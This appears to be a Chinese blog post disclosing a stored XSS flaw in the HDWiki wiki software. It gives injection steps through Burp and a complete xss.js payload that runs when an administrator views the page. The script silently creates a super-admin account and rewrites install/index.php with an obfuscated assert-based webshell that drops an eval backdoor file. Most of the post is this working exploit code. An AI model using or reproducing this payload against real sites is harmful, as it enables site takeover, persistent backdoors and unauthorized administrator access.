HDWiki 储存性xss一枚

创建或编辑词条 存储型xss
使用BURP抓包并改包在,在如下的位置插入
[php]
Content-Disposition: form-data; name="content"

------WebKitFormBoundaryWQNSVRn07IYXGeMN

[/php]
然后提交。

hdwiki 管理cookie 是无法直接 进入后台 以及执行其它后台操作
session 表中 islogin =2 才可以进后台
所以唯有当管理进入后台再触发时候有机率加一个超级管理并且拿到shell
xss.js
[php]
document.writeln("

");
function ajax(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
var _x = ajax();
add(); shell();
function add() {
src="index.php?admin_user-add";
data="id=&username=admin_&password=admin_&email=admin_%40qq.com&groupid=4&submit=%C8%B7%B6%A8";
//add user=admin_ password=admin_
xhr_act("POST",src,data);
}
function shell() {
src="index.php?admin_filemanager-edit";
data="fname=D%3A%2Fwamp%2Fwww%2Fhdwiki%2Finstall%2Findex.php&dir=.%2Finstall%2F&content=%3C%3Fphp%0D%0Aarray_map%28%22ass%5Cx65rt%22%2C%28array%29%24_REQUEST%5B%27test%27%5D%29%3B%0D%0A%40fputs%28%40fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29%3B%0D%0Aheader%28%27location%3Ainstall.php%27%29%3B%0D%0A%09%0D%0A%3F%3E&dosubmit=+%C8%B7%C8%CF%D0%DE%B8%C4+";
//install/index.php test
//fopen c.php 1
xhr_act("POST",src,data);
}
function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
}[/php]

后台登陆再查看就会发现

发表评论